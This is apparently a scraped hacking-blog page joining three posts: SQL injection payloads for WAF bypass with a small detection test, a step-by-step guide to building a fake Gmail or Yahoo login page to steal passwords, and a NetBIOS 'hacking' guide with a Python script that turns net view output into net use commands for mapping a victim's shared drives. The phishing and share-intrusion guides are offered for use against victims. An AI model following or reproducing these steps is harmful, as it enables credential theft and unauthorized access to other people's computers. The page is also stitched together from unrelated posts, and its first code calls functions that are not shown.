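# Constructed payloads -> whether they are injection attempts. The first is
# the only one the naive rule sees; the rest are the post's bypasses.
PAYLOADS = {
    "' or 1=1 --": True,
    "' OR 2=2 --": True,
    "' OR 2/**/=/**/2 --": True,
    "123 union select 1,2,3,4,5--": True,
    "123 union/*We are bypassing the WAF*/select/*x*/1,2,3,4,5--": True,
    "123 uNiOn aLl sElEcT 1,2,3,4,5--": True,
    "id=123": False,
}


def evaluate(matcher):
    """Return {payload: matched} for every constructed payload."""
    return {payload: matcher(payload) for payload in PAYLOADS}


if __name__ == "__main__":
    for payload, expected in PAYLOADS.items():
        print(f"{payload!r:60} naive={naive_match(payload)!s:5} "
              f"hardened={hardened_match(payload)!s:5} attack={expected}")
```

The naive rule fires on exactly one of the six attack payloads; the normalized matcher catches all six and leaves the benign one alone. Its tautology clause is still limited to numeric comparisons (' or 'a'='a' slips through), and it does nothing about the encoding and whitespace variants the next post covers, which is the point: a WAF has to normalize the request the same way the database parser will, not just look for a string.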

I hope you have liked this post. We covered detecting a WAF and some basic techniques for evading one; in the next post we will look at more advanced techniques, such as encoding and whitespace tricks, to bypass a web application firewall.

Source:- www.rafayhackingarticles.net

Wednesday 30 May 2012

How to create Fake login page for any website

A fake login page is a page that exactly resembles the original login page of sites like Yahoo, Gmail, etc. These fake login pages are created purely for the purpose of stealing other people's passwords.

So in this post I will show a method to create a fake login page for the desired site:


How to create a fake login page - Procedure


It is now easy to build a fake login page without any knowledge of programming languages. One can use http://www.jotform.com to build the sign-up page.


{1} Open www.jotform.com and sign up.
{2} Then log in there with your newly registered account.
{3} Now click on 'Create your first form'.
{4} Now delete all the pre-defined entries, leaving only 'First Name:'. (To delete an entry, select it and then click on the cross sign.)
{5} Now click on 'First Name:' (exactly on First Name). The option to edit the First Name is now activated; type there "username:" (for Gmail) or "YahooId:" (for Yahoo).
{6} Now click on the 'Power Tool' option (on the right-hand side).
{7} Double-click on 'Password Box'. Now click the newly created password entry to edit it and rename it 'Password:'.
{8} Now click on the 'Properties' option (on the right-hand side). These are the form properties.
{9} You can give any title to your form. This title is used only to distinguish your forms; it cannot be seen by the victim.
{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. After entering the username and password, the user is redirected to this URL. (Don't leave it blank.)
{11} Now click on 'Save'. After saving, click on the 'Source' option.
{12} You can now see two options, 'Option1' and 'Option2'. Copy the full code of 'Option2'.
{13} Now open the Notepad text editor and paste the Option2 code there.
{14} Now save this as index.html and host it, i.e. put it on the internet so that everyone can view it. I think you already know how to do that; if you do not, leave a comment with your email id and I will mail you the steps.
Now you can view it by typing the URL in the address bar.


NOTE: To put the page on the internet you first need a hosting account, which you can create at www.110mb.com; there are many other sites offering the same that you can find on the internet very easily.
Suppose you created your account at 110mb.com:
Log in to your account, click on "File Manager", then click on "upload files" (or just "upload"). Select the file you want to put on the internet and click on upload. You are done.
Now you can access your file on the net by typing the URL of the file.
The passwords of the users who log in through your page will be sent to the email id you entered while creating the form.



Source:- www.rafayhackingarticles.net  

Tuesday 29 May 2012

Netbios Hacking



THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING A REMOTE COMPUTER AND GAINING ACCESS TO ITS HARD DISK OR PRINTER. A NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.

STEP-BY-STEP NETBIOS HACKING PROCEDURE

1. Open a command prompt.

2. In the command prompt use the "net view" command.
(OR YOU CAN ALSO USE THE "NB Scanner" OPTION IN THE "IP TOOLS" SOFTWARE BY ENTERING A RANGE OF IP ADDRESSES. WITH THIS METHOD YOU CAN SCAN A NUMBER OF COMPUTERS AT A TIME.)

                                   Example: C:\>net view \\219.64.55.112

The above is an example using the command prompt. "net view" is one of the NetBIOS commands for viewing the shared resources of a remote computer. Here 219.64.55.112 is the IP address of the remote computer that is to be hacked through NetBIOS; substitute a valid IP address in its place. If it succeeds, a list of shared HARD-DISK DRIVES and PRINTERS is shown. If not, an error message is displayed, so repeat step 2 with a different IP address.

3. After succeeding, use the "net use" command in the command prompt. "net use" is another NetBIOS command, which makes it possible to map the remote drives or printers onto your own computer.

                                             Example-1:
                                             C:\>net use D: \\219.64.55.112\F
                                             Example-2:
                                             C:\>net use G: \\219.64.55.112\SharedDocs
                                             Example-3:
                                             C:\>net use I: \\219.64.55.112\Myprint
 


   NOTE: In Examples 1, 2 and 3, D:, G: and I: are the network drive names that are created on your computer to access the remote computer's hard disk.

NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES, INCLUDING HARD-DISK DRIVES, FLOPPY DRIVES AND ROM DRIVES, ON YOUR COMPUTER. THAT IS, IF YOU HAVE C: AND D: AS HARD DRIVES, A: AS FLOPPY DRIVE AND E: AS CD DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT.
"F" and "SharedDocs" are the share names of the remote computer's hard-disk drives that you want to hack, and "Myprint" is the name of the remote computer's printer. These are the names displayed by the "net view" command in step 2. 219.64.55.112 is the IP address of the remote computer that you want to hack.

4. After succeeding, your computer will give the message "The command completed successfully". Once you get this message you are only one step away from hacking the computer.

Now open "My Computer" and you will see a new "Hard-Disk drive" (shared) with the specified name. You can open it and access the remote computer's hard drive. You can copy files, music, folders etc. from the victim's hard drive. You can delete or modify data on the victim's hard drive only if WRITE ACCESS is enabled on the victim's system. You can also reach the files and folders quickly through the command prompt.

NOTE: If the remote computer's firewall is enabled (or File and Printer Sharing is switched off), your computer will not succeed in reaching it through NetBIOS and an error message is displayed; NetBIOS hacking is not possible in that situation, so repeat steps 2 and 3 with a different IP address. Also note that "net use" prompts for a username and password unless the share allows anonymous access, which current Windows versions do not by default.
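Steps 2 to 4 above can be scripted. The following is an added example (not code from the original post or from the IP Tools software): parse_net_view() reads the share table that "net view \\<ip>" prints, free_drive_letters() applies the note about not reusing letters already taken by your own drives, and plan_mappings() writes out one "net use" command per disk share. The "net view" output below is constructed for the example, modelled on the post's shares; run_net_view() is the only part that actually calls the command and it only works on Windows.

```python
"""Turn `net view \\host` output into `net use` commands (added example)."""
import os
import re
import string
import subprocess

# Constructed `net view \\219.64.55.112` output, shares taken from the post.
SAMPLE_NET_VIEW = r"""Shared resources at \\219.64.55.112

Share name   Type   Used as  Comment

-------------------------------------------------------------------------------
F            Disk
SharedDocs   Disk
Myprint      Print           HP LaserJet
The command completed successfully.
"""

# One share row: name, then its type. Header and footer lines do not match.
ROW = re.compile(r"^(\S+)\s+(Disk|Print|IPC)\b")


def parse_net_view(text):
    """Return [(share_name, share_type), ...] from `net view` output."""
    shares = []
    for line in text.splitlines():
        match = ROW.match(line)
        if match:
            shares.append((match.group(1), match.group(2)))
    return shares


def used_drive_letters():
    """Drive letters present on this machine (Windows only; [] elsewhere)."""
    return [c for c in string.ascii_uppercase if os.path.exists(f"{c}:\\")]


def free_drive_letters(used):
    """Letters C: upward that are not in `used` (A:/B: are left for floppies)."""
    taken = {u.rstrip(":").upper() for u in used}
    return [c for c in string.ascii_uppercase[2:] if c not in taken]


def plan_mappings(host, shares, used):
    """`net use` command for each Disk share, each on its own free letter.

    Print shares are skipped; they are not mapped to drive letters.
    """
    free = free_drive_letters(used)
    commands = []
    for name, kind in shares:
        if kind != "Disk":
            continue
        if not free:
            raise RuntimeError("no free drive letters left")
        letter = free.pop(0)
        commands.append(f"net use {letter}: \\\\{host}\\{name}")
    return commands


def run_net_view(host):
    """Run `net view \\host` and parse it (Windows only).

    A non-zero exit means the host could not be listed, e.g. "System error 53"
    when the network path is not found or "System error 5" for access denied.
    """
    result = subprocess.run(["net", "view", f"\\\\{host}"],
                            capture_output=True, text=True)
    if result.returncode != 0:
        raise RuntimeError(result.stderr.strip() or result.stdout.strip())
    return parse_net_view(result.stdout)


if __name__ == "__main__":
    # With C:, D: as hard disks, A: floppy and E: CD drive, as in the post's note,
    # the first free letter is F:.
    shares = parse_net_view(SAMPLE_NET_VIEW)
    for command in plan_mappings("219.64.55.112", shares, ["A:", "C:", "D:", "E:"]):
        print(command)
```

On a real scan replace SAMPLE_NET_VIEW with run_net_view(ip) and the constructed `used` list with used_drive_letters(); the printed "net use" lines are what you would type at the prompt in step 3.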

Source:- www.gohacking.com